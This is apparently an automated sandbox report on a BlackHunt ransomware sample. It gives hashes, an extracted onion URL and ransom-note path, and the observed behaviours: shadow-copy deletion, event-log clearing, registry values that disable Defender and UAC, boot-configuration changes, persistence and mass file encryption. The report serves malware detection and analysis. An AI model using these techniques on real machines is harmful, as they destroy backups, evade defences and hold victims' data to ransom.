Analysis
-
max time kernel
13s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
18-01-2024 23:16
Static task
static1
Behavioral task
behavioral1
Sample
4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe
Resource
win10v2004-20231222-en
General
-
Target
4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe
-
Size
707KB
-
MD5
4a2ab44a76fcb72eceed164a393fe63b
-
SHA1
3cc0d8fe462aaf8ca51e769d55ce47d1c52be74d
-
SHA256
4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798
-
SHA512
96c1026f7f611008c0f0112af008aea3cb2fd56655ff090c60340337498d6e9d5dc923d4f96c1030ee952eef0d9d32141c0d36864044e76095ff0a5d825e47c1
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1L8xvnh:6uaTmkZJ+naie5OTamgEoKxLW6lh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 5792 fsutil.exe 12072 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 13240 wevtutil.exe 11428 wevtutil.exe 13028 wevtutil.exe 11132 wevtutil.exe 11776 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 4928 bcdedit.exe 5872 bcdedit.exe 11592 bcdedit.exe 12812 bcdedit.exe -
Renames multiple (2098) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 5800 wbadmin.exe 13540 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\T: 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened (read-only) \??\O: 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened (read-only) \??\B: 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened (read-only) \??\A: 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened (read-only) \??\J: 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\X: 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened (read-only) \??\E: 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened (read-only) \??\S: 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened (read-only) \??\Q: 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened (read-only) \??\W: 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened (read-only) \??\I: 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened (read-only) \??\M: 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\L: 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened (read-only) \??\N: 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened (read-only) \??\R: 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened (read-only) \??\U: 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened (read-only) \??\G: 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened (read-only) \??\H: 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened (read-only) \??\V: 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened (read-only) \??\Y: 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened (read-only) \??\P: 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened (read-only) \??\K: 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened (read-only) \??\Z: 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\jre\COPYRIGHT 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\#BlackHunt_ReadMe.txt 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\#BlackHunt_ReadMe.txt 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\#BlackHunt_Private.key 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\tr-tr\#BlackHunt_ReadMe.hta 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\directshow.md 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\javacpl.cpl 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-cn\#BlackHunt_Private.key 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\ui-strings.js 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\#BlackHunt_ReadMe.txt 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\#BlackHunt_ReadMe.txt 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\jopt-simple.md 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-gb\ui-strings.js 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\#BlackHunt_ReadMe.hta 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\#BlackHunt_Private.key 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\css\main-selector.css 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\cmm\GRAY.pf 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files\VideoLAN\VLC\plugins\misc\#BlackHunt_ReadMe.hta 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm.api 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\AddressBook2x.png 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-cn\#BlackHunt_Private.key 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fi-fi\#BlackHunt_ReadMe.hta 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files\VideoLAN\#BlackHunt_ReadMe.hta 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-cn\#BlackHunt_Private.key 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\#BlackHunt_ReadMe.txt 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\ui-strings.js 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-cn\ui-strings.js 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\#BlackHunt_ReadMe.txt 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files\Java\jre-1.8\lib\amd64\#BlackHunt_ReadMe.txt 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files\Java\jre-1.8\lib\amd64\#BlackHunt_ReadMe.hta 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\accessibility.properties 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\#BlackHunt_ReadMe.hta 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\#BlackHunt_ReadMe.txt 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ru-ru\ui-strings.js 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\css\#BlackHunt_ReadMe.hta 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\#BlackHunt_Private.key 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SendMail.api 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\tr.gif 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\#BlackHunt_ReadMe.hta 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\#BlackHunt_ReadMe.txt 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\#BlackHunt_ReadMe.txt 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\da-dk\ui-strings.js 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\unicode.md 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\#BlackHunt_Private.key 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\#BlackHunt_ReadMe.txt 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_ja.properties 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner.gif 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\nl-nl\#BlackHunt_Private.key 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#BlackHunt_ReadMe.txt 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_extractor\#BlackHunt_ReadMe.hta 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-ae\#BlackHunt_Private.key 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sl-si\#BlackHunt_Private.key 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nb-no\#BlackHunt_ReadMe.txt 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\#BlackHunt_Private.key 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\en-gb\#BlackHunt_ReadMe.hta 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-si\#BlackHunt_ReadMe.txt 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\icons.png 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\plugin.jar 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\#BlackHunt_Private.key 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ko-kr\#BlackHunt_ReadMe.txt 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sl-sl\#BlackHunt_ReadMe.txt 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-ae\#BlackHunt_Private.key 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File created C:\Program Files\VideoLAN\VLC\plugins\gui\#BlackHunt_Private.key 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dummy.luac 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 12328 6520 WerFault.exe 242 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4500 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 7220 vssadmin.exe 6708 vssadmin.exe 5980 vssadmin.exe 6088 vssadmin.exe 7044 vssadmin.exe 11928 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 14500 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 8208 PING.EXE -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe Token: SeRestorePrivilege 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe Token: SeBackupPrivilege 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe Token: SeTakeOwnershipPrivilege 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe Token: SeAuditPrivilege 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe Token: SeSecurityPrivilege 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe Token: SeIncBasePriorityPrivilege 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe Token: SeBackupPrivilege 7552 vssvc.exe Token: SeRestorePrivilege 7552 vssvc.exe Token: SeAuditPrivilege 7552 vssvc.exe Token: SeBackupPrivilege 7940 wbengine.exe Token: SeRestorePrivilege 7940 wbengine.exe Token: SeSecurityPrivilege 7940 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 556 wrote to memory of 5012 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 101 PID 556 wrote to memory of 5012 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 101 PID 556 wrote to memory of 1688 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 99 PID 556 wrote to memory of 1688 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 99 PID 556 wrote to memory of 1196 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 145 PID 556 wrote to memory of 1196 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 145 PID 556 wrote to memory of 1736 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 95 PID 556 wrote to memory of 1736 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 95 PID 556 wrote to memory of 3956 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 94 PID 556 wrote to memory of 3956 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 94 PID 556 wrote to memory of 3636 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 100 PID 556 wrote to memory of 3636 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 100 PID 556 wrote to memory of 3920 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 102 PID 556 wrote to memory of 3920 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 102 PID 5012 wrote to memory of 5060 5012 cmd.exe 104 PID 5012 wrote to memory of 5060 5012 cmd.exe 104 PID 556 wrote to memory of 3152 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 180 PID 556 wrote to memory of 3152 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 180 PID 1736 wrote to memory of 3644 1736 cmd.exe 107 PID 1736 wrote to memory of 3644 1736 cmd.exe 107 PID 556 wrote to memory of 4116 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 151 PID 556 wrote to memory of 4116 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 151 PID 1688 wrote to memory of 1548 1688 cmd.exe 215 PID 1688 wrote to memory of 1548 1688 cmd.exe 215 PID 3956 wrote to memory of 1328 3956 cmd.exe 214 PID 3956 wrote to memory of 1328 3956 cmd.exe 214 PID 556 wrote to memory of 1368 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 112 PID 556 wrote to memory of 1368 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 112 PID 1196 wrote to memory of 4716 1196 Conhost.exe 111 PID 1196 wrote to memory of 4716 1196 Conhost.exe 111 PID 556 wrote to memory of 1996 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 213 PID 556 wrote to memory of 1996 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 213 PID 3636 wrote to memory of 2000 3636 cmd.exe 113 PID 3636 wrote to memory of 2000 3636 cmd.exe 113 PID 3920 wrote to memory of 1156 3920 cmd.exe 115 PID 3920 wrote to memory of 1156 3920 cmd.exe 115 PID 3152 wrote to memory of 3488 3152 Conhost.exe 211 PID 3152 wrote to memory of 3488 3152 Conhost.exe 211 PID 556 wrote to memory of 1976 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 116 PID 556 wrote to memory of 1976 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 116 PID 556 wrote to memory of 3300 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 119 PID 556 wrote to memory of 3300 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 119 PID 4116 wrote to memory of 4904 4116 cmd.exe 118 PID 4116 wrote to memory of 4904 4116 cmd.exe 118 PID 556 wrote to memory of 1320 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 209 PID 556 wrote to memory of 1320 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 209 PID 1368 wrote to memory of 1148 1368 cmd.exe 207 PID 1368 wrote to memory of 1148 1368 cmd.exe 207 PID 1996 wrote to memory of 1144 1996 cmd.exe 206 PID 1996 wrote to memory of 1144 1996 cmd.exe 206 PID 556 wrote to memory of 1476 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 205 PID 556 wrote to memory of 1476 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 205 PID 1976 wrote to memory of 980 1976 cmd.exe 204 PID 1976 wrote to memory of 980 1976 cmd.exe 204 PID 556 wrote to memory of 3760 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 122 PID 556 wrote to memory of 3760 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 122 PID 556 wrote to memory of 504 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 125 PID 556 wrote to memory of 504 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 125 PID 556 wrote to memory of 1864 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 124 PID 556 wrote to memory of 1864 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 124 PID 556 wrote to memory of 1964 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 126 PID 556 wrote to memory of 1964 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 126 PID 556 wrote to memory of 4176 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 128 PID 556 wrote to memory of 4176 556 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe 128 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 4b24ed0666e835e2ab67eabd91427e889623c645df9609082ca976524a7e0798.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
